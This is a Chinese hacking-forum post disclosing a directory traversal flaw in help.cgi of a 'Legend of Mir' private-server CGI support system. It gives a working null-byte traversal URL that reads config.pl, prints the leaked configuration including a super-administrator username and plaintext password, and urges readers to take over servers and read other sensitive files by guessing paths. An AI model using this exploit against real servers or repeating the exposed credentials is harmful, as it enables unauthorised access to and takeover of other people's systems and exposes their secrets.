论坛: 病毒专区 标题: 私服传奇CGI客服系统泄漏源代码漏洞 复制本贴地址    
作者: abctm [abctm]    版主   登录




出处:情感网络 发现者:小路
    传奇CGI客服系统,很多人在用,他可以很方便的提供一些服务,方便站长对传奇管理,别的不多说,就是一个文件:help.cgi,是显示一个帮助文件的cgi文件,他没有验证用户提交的url,我们提交:
  http://xxx.xxx.xxx.xxx:66/help.cgi?T1=../config.pl%00  
就能看到:
    我们来找个人多的 呵呵
    我们看到了GM的角色名字了 再来找密码 辣辣辣~我是GM啦 不在多演示了
#  传奇服务网站程序配置文件
$master_name = "xiaolu"; # 超级管理员用户名(管理中心帐号)
$master_pass = 'xiaoxue520'; # 超级管理员密码

$master_page = "雪儿";  # 传奇服务器名字
$master_copy = " \? $master_page tm ";



$root_path = 'E:/web/MirWeb';        # HTTP服务器根目录
$PATH=$root_path.$ENV{SCRIPT_NAME};
$PATH=~s!(.*)/(.*?)$!$1/!;      # 当前目录



$Mir2BaseDir = 'E:/MirServer';  #  私服主目录
    类似的代码,我们就可以来改传奇了,最重要的是可以用来察看一些敏感文件的代码(只要你能猜到目录:))。 




[此贴被 日月双星(abctm) 在 05月02日18时01分 编辑过]


[此贴被 日月双星(abctm) 在 05月02日18时06分 编辑过]

地主 发表时间: 11/14 22:23

论坛: 病毒专区

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号